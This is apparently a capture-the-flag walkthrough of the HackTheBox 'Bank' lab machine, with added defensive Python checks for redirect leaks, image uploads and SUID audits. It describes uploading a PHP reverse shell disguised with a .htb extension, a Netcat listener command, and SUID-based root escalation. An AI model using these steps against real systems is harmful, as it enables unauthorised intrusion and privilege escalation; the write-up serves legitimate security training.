Let’s get started!

Level: easy

Reconnaissance

This is the initial step: scanning the machine for open services.

COMMAND: nmap -sC -sV -O -oA bank 10.10.10.29

Nmap-Scan

As the nmap scan above shows, three ports are open: 22, 53 and 80.

Let’s enumerate the web server.

URL: http://10.10.10.29

I saw that DNS was open, so I edited /etc/hosts to map the machine’s IP to its hostname. The default hostname for all HackTheBox machines is <name of box>.htb, so I edited the hosts file as follows:

COMMAND: echo "10.10.10.29 bank.htb" >> /etc/hosts

Let’s open the webserver at bank.htb.

The URL redirects to the login.php page every time. I wanted to stop the redirection with a browser add-on, but there is no supported version of it for my Firefox, so I used Burp Suite for the rest of the process.

With Burp Suite’s Repeater I can now request http://bank.htb/ directly, and the response shows the bank’s transactions and some other information.

Fire up Burp Suite, intercept the request, and press Ctrl+R to send it to Repeater.
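The behaviour described above (a redirect to login.php whose response still carries the protected page, which is exactly what Repeater shows when it does not follow the redirect) reproduced as an added Python example; this is not code from the original writeup or from the box. It assumes the usual cause, a Location header sent without the script stopping afterwards; the local server, the /leaky and /fixed paths and the page body are all constructed for the demo. The check function is the one a defender would run against their own application: fetch each protected page without following redirects and fail the test if a 3xx response still has an HTML body.

```python
"""Why a Location redirect alone does not protect a page (added example)."""
import threading
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the protected index page.
PROTECTED_BODY = (b"<html><body><h1>Transactions</h1>"
                  b"<p>acct 0001 -&gt; 250.00</p></body></html>")


class RedirectHandler(BaseHTTPRequestHandler):
    """/leaky models the weak pattern: a 302 to /login.php is sent, but the
    protected body is still written into the same response.
    /fixed sends the 302 and nothing else."""

    def do_GET(self):
        if self.path == "/leaky":
            self.send_response(302)
            self.send_header("Location", "/login.php")
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(PROTECTED_BODY)))
            self.end_headers()
            self.wfile.write(PROTECTED_BODY)  # the bug: body still sent
        elif self.path == "/fixed":
            self.send_response(302)
            self.send_header("Location", "/login.php")
            self.send_header("Content-Length", "0")
            self.end_headers()                # nothing else is written
        else:
            self.send_response(404)
            self.send_header("Content-Length", "0")
            self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Start the demo server on an ephemeral localhost port; return (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), RedirectHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def check_redirect_leak(host, port, path):
    """Fetch `path` WITHOUT following redirects (http.client never does) and
    report whether a 3xx response still carries an HTML body.
    Returns (status, body_bytes, leaked)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    leaked = 300 <= resp.status < 400 and b"<html" in body.lower()
    return resp.status, body, leaked


if __name__ == "__main__":
    srv, port = start_server()
    for p in ("/leaky", "/fixed"):
        status, body, leaked = check_redirect_leak("127.0.0.1", port, p)
        print(f"{p}: HTTP {status}, {len(body)} body bytes, leak={leaked}")
    srv.shutdown()
```

Run it and /leaky reports leak=True while /fixed reports leak=False with a zero-length body; a browser hides the difference because it follows the redirect, which is why the writeup only saw the content once Repeater showed the raw response.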

If we now go to /support.php we can see that “tickets” can be uploaded as images. If you curl http://bank.htb/support.php and scroll through the HTML, you can see that the admin left himself a nice little note:

"<!-- [DEBUG] I added the file extension .htb to execute as PHP for debugging purposes only [DEBUG] -->"

We can use Burp Suite Repeater to upload a PHP shell and get a reverse shell!

I used the Pentest Monkey PHP reverse shell.

I changed the IP to my own and named the file Exp1o1t9r.php. I tried uploading it as Exp1o1t9r.php, but the site only accepts images. Then I remembered that .htb runs as PHP, so I gave my shell the .htb extension; since it executes as PHP “for debugging purposes”, the upload went through. Now all I had to do was set up a Netcat listener to catch the shell.
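The upload check that would have stopped the step above, as an added Python example that is not code from the original writeup or from the box’s support.php. The page shows that the form only compared the declared type or extension, and that any extension the web server had been told to run as PHP got through; the checks below take the opposite approach: a short allowlist of final extensions, the matching magic bytes in the content, no embedded PHP open tag, and a server-chosen random filename so the uploader controls neither name nor extension. The validation function and the sample files are constructed for the example.

```python
"""Server-side checks for an image-only ticket upload (added example)."""
import os
import secrets

# Only these final extensions are ever accepted, and the stored name is
# rebuilt from this table, never from what the client sent.
ALLOWED = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif":  b"GIF8",            # covers GIF87a and GIF89a
}


def validate_upload(filename, content):
    """Return (ok, reason, safe_name).

    Accepts only <name>.<ext> with an allowlisted ext whose content starts
    with that type's magic bytes and contains no PHP open tag. Any second
    dot (shell.php.png, shell.png.htb) is rejected outright, so a handler
    mapping for an odd extension such as .htb can never be reached."""
    base = os.path.basename(filename)        # drop any client-supplied path
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be exactly <name>.<ext>", None
    ext = parts[1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not allowed", None
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type", None
    if b"<?" in content:
        return False, "embedded PHP open tag", None
    # Random server-chosen name: the uploader controls neither name nor extension.
    safe_name = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", safe_name


if __name__ == "__main__":
    # Constructed samples: a minimal PNG header and a file that only claims to be one.
    png = ALLOWED["png"] + b"\x00" * 16
    for name, data in [("ticket.png", png),
                       ("shell.htb", png),
                       ("shell.png.htb", png),
                       ("shell.png", b"<?php echo 1; ?>")]:
        print(name, validate_upload(name, data)[:2])
```

Application checks like these are the second line; the first is the web server itself: remove the debugging handler mapping the note describes, and disable script execution in the uploads directory so that even a file that slips through is served as a static image rather than run.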

nc -v -n -l -p 4444

Once we catch the shell we are on the box as www-data, in the directory /var/www/bank/uploads/:

www-data@bank:/var/www/bank/uploads$

We can go into the home directory of the user chris and get the user flag, user.txt.

Got User Flag!

To perform privilege escalation, one of the first things I always check is which binaries have the SUID bit set:
find / -perm -u=s -type f 2>/dev/null

www-data@bank:/var/htb$ ls -la 
total 16
drwxr-xr-x 3 root root 4096 Jun 14 18:25 .
drwxr-xr-x 14 root root 4096 May 29 18:41 ..
drwxr-xr-x 2 root root 4096 Jun 14 18:30 bin
-rwxr-xr-x 1 root root 356 Jun 14 18:30 emergency

It seems the system administrator has left an emergency exploit behind in case he forgets the root password of the system…
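The defender’s side of the SUID check above, as an added Python example that is not part of the original writeup. It takes the path list that `find / -perm -u=s -type f` prints and flags anything that lives outside the directories where distribution packages install binaries, or that is not in a baseline of expected SUID files. The baseline is an abbreviated, constructed approximation of a stock Ubuntu set (a real audit would take it from a known-good host or package manifests), and the sample scan output is constructed too; the /var/htb path in it is a placeholder standing in for whatever the scan turns up under the directory shown in the listing.

```python
"""Flag unexpected SUID binaries from `find / -perm -u=s -type f` output (added example)."""

# Constructed, abbreviated baseline of SUID files a stock Ubuntu host ships with.
BASELINE = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}

# Directories where package-managed binaries live; anything SUID elsewhere is suspect.
PACKAGE_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def audit_suid(find_output, baseline=BASELINE):
    """Return [(path, reason), ...] for each line of find output worth a look.

    reason is 'outside package dirs' (the strongest signal: a hand-placed
    SUID file under /var, /opt, /home, ...) or 'not in baseline' (a packaged
    location, but not a file the baseline knows about)."""
    findings = []
    for line in find_output.splitlines():
        path = line.strip()
        if not path:
            continue
        if not path.startswith(PACKAGE_DIRS):
            findings.append((path, "outside package dirs"))
        elif path not in baseline:
            findings.append((path, "not in baseline"))
    return findings


# Constructed sample of what the find command prints; the last entry is a
# placeholder path under the directory from the listing, not a real file name.
SAMPLE = """\
/bin/su
/bin/ping
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/var/htb/bin/suid-example
"""

if __name__ == "__main__":
    for path, why in audit_suid(SAMPLE):
        print(f"{why:22s} {path}")
```

Pipe the real scan in (`find / -perm -u=s -type f 2>/dev/null | python3 audit.py` with a `sys.stdin.read()` in place of SAMPLE) and review each 'outside package dirs' hit first; a root-owned SUID file under /var that no package installed is exactly the kind of leftover this box turns on.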

My privileges before running the exploit:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

My privileges after running the emergency exploit:

./emergency

uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

And now we can get the root flag: cat /root/root.txt

Got Root Flag!

If you like my writeup, Give me Respect on my HTB profile: Exp1o1t9r
